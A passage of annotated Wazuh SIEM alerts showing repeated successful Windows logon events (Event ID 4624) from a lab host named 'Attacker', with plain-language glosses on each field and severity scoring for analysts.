No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:08.0405533Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43755
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10720
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.837+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.837+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.454244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:09.1230899Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43757
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:07.903+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.903+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533927.461580
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:13.4677661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43759
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.048+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.048+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533928.468918
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:17.3513724Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43763
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  5404
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 2 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x25F1ED7 Linked Logon ID: 0x25F285D Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x624 Process Name: C:\Windows\System32\svchost.exe Network Information: Workstation Name: ATTACKER Source Network Address: 127.0.0.1 Source Port: 0 Detailed Authentication Information: Logon Process: User32 Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x25f1ed7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  User32
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.workstationName:  ATTACKER
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipAddress:  127.0.0.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.ipPort:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x25f285d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows workstation logon success.

🧠 What happened? Windows workstation logon success.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:08.074+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows workstation logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60118
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

